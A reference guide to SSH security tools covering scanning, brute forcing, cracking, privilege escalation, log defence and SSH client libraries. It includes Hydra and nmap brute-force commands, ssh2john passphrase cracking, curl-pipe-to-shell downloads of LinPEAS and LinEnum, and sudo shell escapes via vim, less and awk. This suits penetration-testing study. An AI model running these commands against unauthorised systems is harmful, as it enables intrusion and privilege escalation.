Comprehensive guide to tools used for SSH reconnaissance, scanning, exploitation, and post-exploitation
Nmap (Network Mapper) is a free and open-source utility for network discovery and security auditing. It's one of the most versatile tools for SSH reconnaissance and scanning.
# Basic SSH scan
nmap -p 22 192.168.1.0/24
# Service version detection
nmap -sV -p 22 192.168.1.1
# SSH script scanning
nmap --script ssh-auth-methods -p 22 192.168.1.1
# SSH brute force
nmap --script ssh-brute --script-args userdb=users.txt,passdb=passwords.txt -p 22 192.168.1.1
# SSH host key checking
nmap --script ssh-hostkey -p 22 192.168.1.1# Debian/Ubuntu
sudo apt-get install nmap
# Red Hat/CentOS
sudo yum install nmap
# macOS
brew install nmapSSH-Audit is a tool for SSH server auditing. It analyzes SSH server configuration and identifies security issues.
# Basic usage
ssh-audit.py 192.168.1.1
# Specify port
ssh-audit.py 192.168.1.1:2222
# JSON output
ssh-audit.py --json 192.168.1.1
# Policy-based scanning
ssh-audit.py -P policy.txt 192.168.1.1
# Batch scanning
ssh-audit.py -T targets.txt# Using pip
pip install ssh-audit
# From source
git clone https://github.com/jtesta/ssh-audit.git
cd ssh-audit
./ssh-audit.pyHydra is a parallelized login cracker which supports numerous protocols including SSH. It's one of the most popular tools for SSH password brute forcing.
# Basic usage
hydra -l username -P wordlist.txt ssh://192.168.1.1
# Multiple usernames
hydra -L usernames.txt -P passwords.txt ssh://192.168.1.1
# Specify port
hydra -l username -P wordlist.txt ssh://192.168.1.1:2222
# Limit parallel tasks
hydra -t 4 -l username -P wordlist.txt ssh://192.168.1.1
# Verbose output
hydra -V -l username -P wordlist.txt ssh://192.168.1.1# Debian/Ubuntu
sudo apt-get install hydra
# Red Hat/CentOS
sudo yum install hydra
# macOS
brew install hydraJohn the Ripper is a fast password cracker that can be used to crack SSH private key passphrases.
# Convert SSH private key to John format
ssh2john id_rsa > id_rsa.hash
# Crack the key with John
john --wordlist=wordlist.txt id_rsa.hash
# Show cracked passwords
john --show id_rsa.hash
# Use incremental mode
john --incremental id_rsa.hash
# Use rules
john --wordlist=wordlist.txt --rules id_rsa.hash# Debian/Ubuntu
sudo apt-get install john
# Red Hat/CentOS
sudo yum install john
# macOS
brew install johnLinPEAS is a script that searches for possible paths to escalate privileges on Linux/Unix hosts.
# Download and execute
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# Execute from local file
./linpeas.sh
# Execute with more thorough checks
./linpeas.sh -aLinEnum is a simple bash script that performs common commands related to privilege escalation.
# Download and execute
curl -L https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | sh
# Execute from local file
./LinEnum.sh
# Execute with thorough checks
./LinEnum.sh -tGTFOBins is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions.
# Example: Exploiting sudo vim
sudo vim -c ':!/bin/bash'
# Example: Exploiting sudo less
sudo less /etc/passwd
!/bin/bash
# Example: Exploiting sudo awk
sudo awk 'BEGIN {system("/bin/bash")}'Logwatch is a customizable log analysis system that can be used to analyze SSH logs.
# Install Logwatch
apt-get install logwatch
# Run Logwatch for SSH
logwatch --service sshd --range today --detail high
# Generate a report
logwatch --service sshd --range yesterday --detail high --output file --filename /tmp/ssh_report.txtFail2ban is a tool that scans log files and bans IP addresses that show malicious behavior.
# Install Fail2ban
apt-get install fail2ban
# Check Fail2ban status
fail2ban-client status sshd
# Check Fail2ban logs
cat /var/log/fail2ban.log
# Unban an IP address
fail2ban-client set sshd unbanip 192.168.1.1The ELK Stack (Elasticsearch, Logstash, Kibana) is a powerful log analysis platform that can be used to analyze SSH logs.
# Example Logstash configuration for SSH logs
input {
file {
path => "/var/log/auth.log"
type => "syslog"
}
}
filter {
if [type] == "syslog" {
grok {
match => { "message" => "%{SYSLOGTIMESTAMP:timestamp} %{HOSTNAME:hostname} %{DATA:program}(?:\[%{POSINT:pid}\])?: %{GREEDYDATA:message}" }
}
if [program] == "sshd" {
grok {
match => { "message" => "Failed password for %{USERNAME:username} from %{IP:src_ip} port %{NUMBER:src_port} ssh2" }
}
}
}
}
output {
elasticsearch {
hosts => ["localhost:9200"]
index => "ssh-logs-%{+YYYY.MM.dd}"
}
}Paramiko is a Python implementation of the SSHv2 protocol, providing both client and server functionality.
# Install Paramiko
pip install paramiko
# Basic SSH client
import paramiko
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect('hostname', username='user', password='password')
stdin, stdout, stderr = ssh.exec_command('ls -l')
print(stdout.read().decode())
ssh.close()libssh is a C library implementing the SSHv2 protocol on client and server side.
// Basic SSH client
#include <libssh/libssh.h>
#include <stdlib.h>
int main() {
ssh_session my_ssh_session = ssh_new();
if (my_ssh_session == NULL) {
exit(-1);
}
ssh_options_set(my_ssh_session, SSH_OPTIONS_HOST, "hostname");
ssh_options_set(my_ssh_session, SSH_OPTIONS_USER, "username");
int rc = ssh_connect(my_ssh_session);
if (rc != SSH_OK) {
fprintf(stderr, "Error connecting to host: %s\n", ssh_get_error(my_ssh_session));
ssh_free(my_ssh_session);
exit(-1);
}
rc = ssh_userauth_password(my_ssh_session, NULL, "password");
if (rc != SSH_AUTH_SUCCESS) {
fprintf(stderr, "Error authenticating with password: %s\n", ssh_get_error(my_ssh_session));
ssh_disconnect(my_ssh_session);
ssh_free(my_ssh_session);
exit(-1);
}
ssh_disconnect(my_ssh_session);
ssh_free(my_ssh_session);
return 0;
}Go SSH is a Go package that implements SSH client and server functionality.
// Basic SSH client
package main
import (
"fmt"
"golang.org/x/crypto/ssh"
"io/ioutil"
"log"
)
func main() {
// Create SSH client config
config := &ssh.ClientConfig{
User: "username",
Auth: []ssh.AuthMethod{
ssh.Password("password"),
},
HostKeyCallback: ssh.InsecureIgnoreHostKey(),
}
// Connect to SSH server
client, err := ssh.Dial("tcp", "hostname:22", config)
if err != nil {
log.Fatalf("Failed to dial: %s", err)
}
defer client.Close()
// Create a session
session, err := client.NewSession()
if err != nil {
log.Fatalf("Failed to create session: %s", err)
}
defer session.Close()
// Run command
output, err := session.CombinedOutput("ls -l")
if err != nil {
log.Fatalf("Failed to run command: %s", err)
}
fmt.Printf("%s\n", output)
}Metasploit Framework provides a platform for developing and executing exploit code against remote target machines.
# Basic Metasploit module structure
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'SSH Scanner',
'Description' => 'This module scans for SSH servers.',
'Author' => ['Your Name'],
'License' => MSF_LICENSE
))
register_options(
[
Opt::RPORT(22)
], self.class)
end
def run_host(ip)
begin
connect
banner = sock.get_once(-1, 5)
if banner
print_good("#{ip}:#{rport} - SSH server banner: #{banner}")
report_service(
:host => ip,
:port => rport,
:name => "ssh",
:info => banner
)
end
rescue ::Rex::ConnectionError
print_error("#{ip}:#{rport} - Connection failed")
ensure
disconnect
end
end
endImpacket is a collection of Python classes for working with network protocols, including SSH.
Scapy is a powerful Python-based interactive packet manipulation program and library.